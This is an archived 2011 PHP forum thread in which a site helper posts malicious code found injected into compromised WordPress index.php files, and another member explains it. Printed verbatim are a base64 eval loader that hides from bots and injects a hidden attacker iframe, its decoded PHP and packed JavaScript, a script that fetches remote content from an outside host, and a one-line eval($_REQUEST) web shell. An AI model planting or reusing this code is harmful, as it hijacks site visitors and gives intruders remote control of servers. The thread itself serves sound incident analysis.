PHP Developers Network
http://forums.devnetwork.net/

Wordpress Security Concerns
http://forums.devnetwork.net/viewtopic.php?f=34&t=133145
Page 1 of 1

Author:  Essentially87 [ Mon Nov 28, 2011 9:21 pm ]
Post subject:  Wordpress Security Concerns

Hi all,

Background info:
Overseas developer working for an affiliate program also developed a lot of individual sites tied into said affiliate program for my roommate's current boss. They know they are being stolen from because of decreased revenues and suspicious activity.

They said they hired some former NSA specialist...nonsense. By no means am I proficient in Security or PHP itself in the matter but what we have discovered is encrypted PHP and Javascript that has been injected into the index.php file on several of sites the sites. This line of code was not there a month ago; verified when current copies are compared to backups.

Any insight or help would be GREATLY appreciated. Below you can find the encoded version and decoded version. Still working on decoding the JScript. My hypothesis is that somehow this former developer programmed in a back door that lets him redirect traffic from their affiliate to his personal affiliate site and collect the profits unbeknownst the owners of the site. They are also running older insecure versions of WordPress. I have been recommending upgrades for months now but maybe this information will finally prompt them to act. It's not my job just doing this for a friend.

Encoded Version
Syntax: [ Download ] [ Hide ]
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKCI8c2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj4iLmJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzWkNsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLV1JiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhERXpOSGNySjMwN1l6MHhPMzA3ZDJocGJHVW9ZeTB0S1dsbUtHdGJZMTBwY0Qxd0xuSmxjR3hoWTJVb2JtVjNJRkpsWjBWNGNDZ25YREV6TkdJbksyVW9ZeWtySjF3eE16UmNNVFF5Snl3blhERTBOeWNwTEd0YlkxMHBPM0psZEhWeWJpQndPMzBvSjFGY2VESXdYSGd6T1QxUUlGeDROVE5jTlRBcFhEY3pYRGN4TGxKY05UQTVYSGd5UlU5Y2VESTRYRFV4WERVelhEWXhYRFV4WERjelhIZzJRVncxTUZ4NE5FTXVYREV4TTF3ME5sdzBObVJjZURKRlhERTJORncxTms1Y2VESTRYQ2RjWEUxY01UTTBYSGczTTF4Y1ZGeGNYREUzTWx4NE5VTmNlRE00WERRM0tWeDRNMFJjTnpWY2VESkVYRFl4S1h0a1hEVTJYRFl4TUZ4NE1qaGNORGRjZURORGFseDROVU5jZURWQlhIZzFRMXg0TXpkY1hGeDRNekZjZURNeVhGeGNNVFF4WEhnMVExdzJNVEZjZURWRFhERTJNbHg0TTBSY01UTTBYSGcyTlZ3bksxdzJNaTQyWERVd1hIZ3pNbHg0TWtWY05qVmNOVEJjTlRFcVhEWXpYSGd5UWx3Mk0xdzFNU3RjZURJM1hIZzFRMXg0TmpWY1hGeDROalpjZURWRFhIZzFPVnhjWERFeU5sd3hNelJjTVRJMVhERXpORng0TnpaY2VEVkRPRnhjWERFME4xd25YRFV6WERZeVhEVTJObHcxTUZ3Mk1sdzFOalZjZURJNFhEVXhLak5jTlROY05qTmNlREk1SzF3blhGeGNlREl5WEhnMVExd3hNekJjTVRNMFYxd3hNelJjZURRelhERXpORng0TkRGY01UTTBkVng0TlVOY2VEUXlYRnczWEZ4MVhERXpORng0TXpoY2VEVkRYSGd5TWx4NE16QmNYRndpWERFek5Gd3hORFpjWEZ3eE5ESmNNVE0wTkZ4NE5VTmNlRFE0WEZ4Y05qZGNlRFZEWEhnek9GeDROVU5jTVRRM1hERXpORnd4TlRkY01UTTBYREUxTlZ4Y1NWeGNORnhjWERFME1Wd3hNelJjTVRVMVhERXpORng0TmpOY01UTTBYREUxTTF4NE5VTmNNVFl3WEZ4Y2VEUkJYREV6TkdKY01UTTBYREV3TkZ4Y1hIZzBOVnhjWERFd05seGNYSGcwTjF4NE5VTmNOakZjTVRVMFhGdzNYREV6TkZ4NE16RmNNVFUzWEhnMVEyc3RYRFEzWEhneVFqSmNOVFkyWEhneU9ESmNlREpGWEhnek5WeDRNamhjZURJNUtsdzJNeXRjZURaREtTdGNORGRjZURNeFhERTFObHhjWERZeFhERTJNVng0TlVOMlhGeGNlRFF4WEhnMVEyZzZYREV6TkZ4NE16RmNNVFl3WEhneU55dGNOakpjZURKRlhEWTJYRFV3TWk0MVhIZ3lPQ2xjTlRKY2VETXpYRFV6YkZ4NE1qbGNlREpDWEhneU4xd3hNelF4YTF3eE16UmNNVFExWERFek5Gd3hORFpjTVRNMFlsd3hNelJjTVRVMlhIZzFRekZjTVRVeVhGeDNYSGcxUXpGY01UVTFYSGcxUXpSY01UTTBORnd4TXpSY01UVTNPbHd4TXpSY2VETXhYSGczTmk5NFhGeGNlRFk0WERFek5GdzJNVng0TnpWY01UTTBYSGczTVZ4Y01WeDROekpjWEZ3Mk1YTmNYRncyTVhSY2VEVkRYREUwTTF4Y1hIZzJNVnhjWEhnMk0xeGNORnd4TXpSY01UWXlYRnhjTmpGY01UVXhYRnhjZURZeFhGeGNOakZjTmpkY2VESkdhVng0TlVOY01UWXhYREV6TkZ4NE16RmNOekJjTVRNMFhEWXhYRGN4WERVMlhGeG9YSGcxUXpGY05qWS9YSGcxUTF4NE16RmNlRE16WEZ4Y2VETXhORng0TlVOY01UUTNYSGcxUTF4NE16RmNlRE0xWEhnelExeGNNV0ZjTVRNMFhIZ3pNVnd4TkRaY2VEVkRYREUyTUZ4NE5VTmNNVGN4WEhnMVExdzJOMXhjWERZeFoxd25YRFV4WEhnelFseDROalJjTlRaY01UWTBYRGMxWERRM1hEWXhhRng0TlVOelhERXpOSGxjTVRNMGVseGNkMXg0TWpkY2VESkNYRFl5WERVMlhIZ3pObHg0TWpoY05qSmNOVFkxWEhneU9GdzFNVncxTWx3Mk1XVmNlREk1WERVelhDYzdJRnczTVZ3eE16UmNlRE14WWx4Y1hIZzJSVng0TlVNeFhIZzJNMXd4TXpSY01UUXlYREV6TkZ4NE16aGNlREkzWEhneVFseDRNemt1WEhnek1WeDROalJjZURJNEtWd3hOelVuTERZeUxEazBMQ2RjTVRjMFhIZzNRMDFoWERFMk5GeDROamhjZURkRFhEWXhYRFl3WERZd1hIZzNRekUyTkZ3eE56UmNlRGN5WERFME1WeDROa1ZjTVRRMFhIZzJSbHg0TmtSOFhIZzJObHd4TlRSdmIxeDROekpjZURkRE1WeDRNelJjTmpWY01UYzBlRE5jTVRBMGZHVjRYSGczTUh4Y2VETXhYSGd6TlZ3Mk1Yd3hYSGd6TmpOOFhEWXhYRFkxWERZMlhERTNORng0TmpSY2VEWkdZMXd4TmpWdFpWd3hOVFpjZURjMGZIaGNlRE15WEhnek1sd3hOelJjTVRjd01qQjhYRFkwTWx3eE56UmNOakZjTmpaY05qQmNNVGMwZkdsY01UUTJYREUzTkRjeVhIZzNRekpjTmpBd1hIZzNRMXg0TXpGY05qVTNYREUzTkZ3Mk1UWmNOako4WEhnM09EY3dmRng0TXpGY2VETTBNVnd4TnpSY01UY3dYRFkyUlZ3eE56UmNOakZjZURNMU1GeDROME5jTmpGY2VETTJOVng0TjBOY01UUXpYSGcyUmx4NE5rWmNNVFV6WERFMU1WeDROalZjZURkRGVEY3lmRng0TnpnM1hIZ3pORng0TjBOY05qYzFYREUzTkZ4NE4wTmNlRE14WERZMU5WeDROME5jZURjNFhIZ3pOelJjZURZMFhERTNORnd4TnpCY2VETTJYREV3Tmx4NE4wTmNNVGN3TmpSOFhIZ3pNVng0TXpSY2VETTFYREUwTWx3eE56UmNOakZjTmpWY05qZGNlRFpEWEhnM1Exd3hOekEzTlZ4NE4wTmNlRE14WERZMk5Gd3hORFZjZURkRFhIZzNPRncyTTF3eE1ESjhYSGd6TVZ3Mk4xeDRNekZjZURaRFhERTNOREZjTmpaY05qTmNNVFV4WEhnM1ExeDRNekUwWEhnek1seDROME5jZURZelhIZzJSbHd4TlRkY2VEWkNYSGcyT1dWRlhIZzJSVng0TmpGY01UUXlYSGcyUTJWY01UUTBYSGczUTI1Y2VEWXhYSGczTm1sY01UUTNZWFJ2Y2x4NE4wTXhYRFl6WEhnek4xd3hNemRjTVRjMFhIZzJPVnd4TlRaa1pWeDROemhjTVRFM1pseDROME5uWlZ4NE56UkVZWFJjTVRRMWZGeDROa1ZsWEhnM04xd3hOelIyWERFME1YSmNlRGREYzF4NE5qVjBYSGcwTkZ4NE5qRmNlRGMwWERFME5Wd3hOelJjZURRMFhIZzJNVnd4TmpSbGZGd3hOekJjZURNMlhIZzBORnd4TnpSNFhIZ3pObHcyTjJoOFhERTNNRncyTmx4NE16VmNlRFk1WEhnM1ExeDRNekZjTmpSY05qRmNNVFUxWERFM05GeDROemhjTmpKY05qQm1YSGczTWx3eE56UjRYSGd6Tmx4NE16aGNNVGMwWERFM01GdzJOekpjTVRReFhERTFOVng0TjBOY01UWTNYREUyTWx3eE5URjBYSGcyTlh3eFhEWTBYSGd6TkhSOE5EQmNlRGMzWERFM05GeDROemhjTmpZM1hIZzJSbHg0TjBNM05URjhYRFkzWERZMlhIZzNRekZjZURNMU1GeDROekJjTVRjMFhIZzNPRncyTjF4NE5ERjhYRFl4WEhnek5GeDRNelJjZURkRFhIZ3pNVncyTkZ3Mk5YaGNNVGMwZUZ4NE16SmNNVEEyYVZ4NE4wTmNNVGN3TmpsOFhIZzNPRncyTmx3Mk5Wd3hOelIwWEhnMlJseDROVFZVWEhnME0xTmNlRGMwY2x4NE5qbGNlRFpGWERFME4xeDROME5jZURNNU9WdzNNVGs1T1Z4NE16bGNNVGMwZUZ3Mk5seDRNelpjZURjeVhERTNOSGd6WEhnME5WeDROME5mWDF3eE56UmNlRGM0TWtWY01UUXlYREUzTkZ4NE56ZzJYSGd6TTF4NE4wTmNlRGM0WEhnek4xdzJNSGhjTVRjMFhERTNNRng0TXpaY2VEUXpmRFF5WEhnMk9Gd3hOelJjTVRZd1hIZzNPSHhjTVRjd05seDRNelowZkZ3eE56QXlSSHczWEhnek0zeGNNVGN3WEhnek4xdzJOM3hjTmpGY2VETTJYRFl4WEhnMlJWeDROME5jZURjNE1rVmNNVGMwTVZ4NE16WXhmRng0TnpoY2VETXlYSGcwTmljdWMzQnNhWFFvSjF3eE56UW5LU3d3TEh0OUtTaz0nKS4iPC9zY3JpcHQ+Iik7DQp9'));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */


/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */

define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>


Decoded Version
Syntax: [ Download ] [ Hide ]
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
        echo("<script type=\"text/javascript\">".base64_decode('ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKWRbZShjKV09a1tjXXx8ZShjKTtrPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXDEzNHcrJ307Yz0xO307d2hpbGUoYy0tKWlmKGtbY10pcD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXDEzNGInK2UoYykrJ1wxMzRcMTQyJywnXDE0NycpLGtbY10pO3JldHVybiBwO30oJ1FceDIwXHgzOT1QIFx4NTNcNTApXDczXDcxLlJcNTA5XHgyRU9ceDI4XDUxXDUzXDYxXDUxXDczXHg2QVw1MFx4NEMuXDExM1w0Nlw0NmRceDJFXDE2NFw1Nk5ceDI4XCdcXE1cMTM0XHg3M1xcVFxcXDE3Mlx4NUNceDM4XDQ3KVx4M0RcNzVceDJEXDYxKXtkXDU2XDYxMFx4MjhcNDdceDNDalx4NUNceDVBXHg1Q1x4MzdcXFx4MzFceDMyXFxcMTQxXHg1Q1w2MTFceDVDXDE2Mlx4M0RcMTM0XHg2NVwnK1w2Mi42XDUwXHgzMlx4MkVcNjVcNTBcNTEqXDYzXHgyQlw2M1w1MStceDI3XHg1Q1x4NjVcXFx4NjZceDVDXHg1OVxcXDEyNlwxMzRcMTI1XDEzNFx4NzZceDVDOFxcXDE0N1wnXDUzXDYyXDU2Nlw1MFw2Mlw1NjVceDI4XDUxKjNcNTNcNjNceDI5K1wnXFxceDIyXHg1Q1wxMzBcMTM0V1wxMzRceDQzXDEzNFx4NDFcMTM0dVx4NUNceDQyXFw3XFx1XDEzNFx4MzhceDVDXHgyMlx4MzBcXFwiXDEzNFwxNDZcXFwxNDJcMTM0NFx4NUNceDQ4XFxcNjdceDVDXHgzOFx4NUNcMTQ3XDEzNFwxNTdcMTM0XDE1NVxcSVxcNFxcXDE0MVwxMzRcMTU1XDEzNFx4NjNcMTM0XDE1M1x4NUNcMTYwXFxceDRBXDEzNGJcMTM0XDEwNFxcXHg0NVxcXDEwNlxcXHg0N1x4NUNcNjFcMTU0XFw3XDEzNFx4MzFcMTU3XHg1Q2stXDQ3XHgyQjJcNTY2XHgyODJceDJFXHgzNVx4MjhceDI5Klw2MytceDZDKStcNDdceDMxXDE1NlxcXDYxXDE2MVx4NUN2XFxceDQxXHg1Q2g6XDEzNFx4MzFcMTYwXHgyNytcNjJceDJFXDY2XDUwMi41XHgyOClcNTJceDMzXDUzbFx4MjlceDJCXHgyN1wxMzQxa1wxMzRcMTQ1XDEzNFwxNDZcMTM0YlwxMzRcMTU2XHg1QzFcMTUyXFx3XHg1QzFcMTU1XHg1QzRcMTM0NFwxMzRcMTU3OlwxMzRceDMxXHg3Ni94XFxceDY4XDEzNFw2MVx4NzVcMTM0XHg3MVxcMVx4NzJcXFw2MXNcXFw2MXRceDVDXDE0M1xcXHg2MVxcXHg2M1xcNFwxMzRcMTYyXFxcNjFcMTUxXFxceDYxXFxcNjFcNjdceDJGaVx4NUNcMTYxXDEzNFx4MzFcNzBcMTM0XDYxXDcxXDU2XFxoXHg1QzFcNjY/XHg1Q1x4MzFceDMzXFxceDMxNFx4NUNcMTQ3XHg1Q1x4MzFceDM1XHgzQ1xcMWFcMTM0XHgzMVwxNDZceDVDXDE2MFx4NUNcMTcxXHg1Q1w2N1xcXDYxZ1wnXDUxXHgzQlx4NjRcNTZcMTY0XDc1XDQ3XDYxaFx4NUNzXDEzNHlcMTM0elxcd1x4MjdceDJCXDYyXDU2XHgzNlx4MjhcNjJcNTY1XHgyOFw1MVw1Mlw2MWVceDI5XDUzXCc7IFw3MVwxMzRceDMxYlxcXHg2RVx4NUMxXHg2M1wxMzRcMTQyXDEzNFx4MzhceDI3XHgyQlx4MzkuXHgzMVx4NjRceDI4KVwxNzUnLDYyLDk0LCdcMTc0XHg3Q01hXDE2NFx4NjhceDdDXDYxXDYwXDYwXHg3QzE2NFwxNzRceDcyXDE0MVx4NkVcMTQ0XHg2Rlx4NkR8XHg2NlwxNTRvb1x4NzJceDdDMVx4MzRcNjVcMTc0eDNcMTA0fGV4XHg3MHxceDMxXHgzNVw2MXwxXHgzNjN8XDYxXDY1XDY2XDE3NFx4NjRceDZGY1wxNjVtZVwxNTZceDc0fHhceDMyXHgzMlwxNzRcMTcwMjB8XDY0MlwxNzRcNjFcNjZcNjBcMTc0fGlcMTQ2XDE3NDcyXHg3QzJcNjAwXHg3Q1x4MzFcNjU3XDE3NFw2MTZcNjJ8XHg3ODcwfFx4MzFceDM0MVwxNzRcMTcwXDY2RVwxNzRcNjFceDM1MFx4N0NcNjFceDM2NVx4N0NcMTQzXHg2Rlx4NkZcMTUzXDE1MVx4NjVceDdDeDcyfFx4Nzg3XHgzNFx4N0NcNjc1XDE3NFx4N0NceDMxXDY1NVx4N0NceDc4XHgzNzRceDY0XDE3NFwxNzBceDM2XDEwNlx4N0NcMTcwNjR8XHgzMVx4MzRceDM1XDE0MlwxNzRcNjFcNjVcNjdceDZDXHg3Q1wxNzA3NVx4N0NceDMxXDY2NFwxNDVceDdDXHg3OFw2M1wxMDJ8XHgzMVw2N1x4MzFceDZDXDE3NDFcNjZcNjNcMTUxXHg3Q1x4MzE0XHgzMlx4N0NceDYzXHg2RlwxNTdceDZCXHg2OWVFXHg2RVx4NjFcMTQyXHg2Q2VcMTQ0XHg3Q25ceDYxXHg3NmlcMTQ3YXRvclx4N0MxXDYzXHgzN1wxMzdcMTc0XHg2OVwxNTZkZVx4NzhcMTE3Zlx4N0NnZVx4NzREYXRcMTQ1fFx4NkVlXHg3N1wxNzR2XDE0MXJceDdDc1x4NjV0XHg0NFx4NjFceDc0XDE0NVwxNzRceDQ0XHg2MVwxNjRlfFwxNzBceDM2XHg0NFwxNzR4XHgzNlw2N2h8XDE3MFw2Nlx4MzVceDY5XHg3Q1x4MzFcNjRcNjFcMTU1XDE3NFx4NzhcNjJcNjBmXHg3MlwxNzR4XHgzNlx4MzhcMTc0XDE3MFw2NzJcMTQxXDE1NVx4N0NcMTY3XDE2MlwxNTF0XHg2NXwxXDY0XHgzNHR8NDBceDc3XDE3NFx4NzhcNjY3XHg2Rlx4N0M3NTF8XDY3XDY2XHg3QzFceDM1MFx4NzBcMTc0XHg3OFw2N1x4NDF8XDYxXHgzNFx4MzRceDdDXHgzMVw2NFw2NXhcMTc0eFx4MzJcMTA2aVx4N0NcMTcwNjl8XHg3OFw2Nlw2NVwxNzR0XHg2Rlx4NTVUXHg0M1NceDc0clx4NjlceDZFXDE0N1x4N0NceDM5OVw3MTk5OVx4MzlcMTc0eFw2Nlx4MzZceDcyXDE3NHgzXHg0NVx4N0NfX1wxNzRceDc4MkVcMTQyXDE3NFx4Nzg2XHgzM1x4N0NceDc4XHgzN1w2MHhcMTc0XDE3MFx4MzZceDQzfDQyXHg2OFwxNzRcMTYwXHg3OHxcMTcwNlx4MzZ0fFwxNzAyRHw3XHgzM3xcMTcwXHgzN1w2N3xcNjFceDM2XDYxXHg2RVx4N0NceDc4MkVcMTc0MVx4MzYxfFx4NzhceDMyXHg0Nicuc3BsaXQoJ1wxNzQnKSwwLHt9KSk=')."</script>");
}

Author:  Essentially87 [ Mon Nov 28, 2011 10:23 pm ]
Post subject:  Re: Wordpress Security Concerns

Decoded Javascript
Syntax: [ Download ] [ Hide ]
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,'g’),k[c]);return p}(‘l n=k.r&&s.t.u(“v”)==-1;l o=k.p&&s.t.u(“v”)==-1;l w=’C=0 D=0 E=”0″ F=”0″ G=”0″ H=”0″ I=”0″ J=”K”‘;l c=L M();c[0]=”d://e.f-b.g/m.h?i=j”;c[1]=”d://e.f-b.g/b.h?i=j”;c[2]=”d://e.f-b.g/m.h?i=j”;c[3]=”d://e.f-b.g/b.h?i=j”;c[4]=”d://e.f-b.g/m.h?i=j”;c[5]=”d://e.f-b.g/b.h?i=j”;c[6]=”d://e.f-b.g/m.h?i=j”;c[7]=”d://e.f-b.g/b.h?i=j”;c[8]=”d://e.f-b.g/m.h?i=j”;c[9]=”d://e.f-b.g/b.h?i=j”;x(n||o)k.N(‘<y O=”q” z=”" ‘+w+’></y>’);P A(){x(n||o){l a=k.p?k.p(“q”):k.r.q;a.z=c[B.Q(B.R()*c.S)]}};T.U=A’,57,57,’|||||||||||layer|randomcontent|http|www|lose|de|php|user|242873|document|var|layer2|ie|dom|getElementById|dynstuff|all|navigator|userAgent|indexOf|Opera|iframeprops|if|iframe|src|random_iframe|Math|width|height|marginwidth|marginheight|hspace|vspace|frameborder|scrolling|no|new|Array|write|id|function|floor|random|length|window|onload’.split(‘|’),0,{}))

Author:  McInfo [ Tue Nov 29, 2011 1:37 am ]
Post subject:  Re: Wordpress Security Concerns

The PHP script appears to inject some JavaScript for visitors whose browsers do not match the list of bots. I sent you a PM containing the unobscured JavaScript. It appears to check for the presence of a cookie. If the cookie is not found, it injects a randomly-sized, randomly-positioned (off screen) iframe which links to the attacker's website. It also sets the cookie it was looking for. The cookie contains a random number and expires in one day. It is named "__umtd", which probably is meant to mimic Urchin Tracking Module cookies ("__utm*"), but has the "t" and "m" transposed for unknown reasons.

Author:  Essentially87 [ Wed Nov 30, 2011 1:57 pm ]
Post subject:  Re: Wordpress Security Concerns

Can anyone offer some insight on this additional malicious code I found?

Syntax: [ Download ] [ Hide ]
<?php
eval(error_reporting(0);
function nurlget ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) {$out = false;}
curl_close ($ch);
} else {
$out = file_get_contents($url);
}
return (trim($out));
}
$qs = $_SERVER["QUERY_STRING"];
if($qs) echo(nurlget('http://tpvggiiewv.info/index.php?'.$qs));); ?>

=malware

That's not actually the backdoor.

The back door was in a file called "google971ca75712474fb14e9d9959b9e32653.php" which contained simply:

<?php @eval(stripslashes($_REQUEST[asc])); ?>

And that alone my friend, is the back door that allows the script to be injected into every website on the server.

Author:  McInfo [ Wed Nov 30, 2011 10:28 pm ]
Post subject:  Re: Wordpress Security Concerns

By "offer some insight" do you mean explain what the code does? The first script is supposed to load additional code from a remote site and execute it. As shown, it will fail because the usage of eval() is syntactically incorrect. The second script executes code submitted to it through an HTTP request.

Page 1 of 1 All times are UTC - 5 hours
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/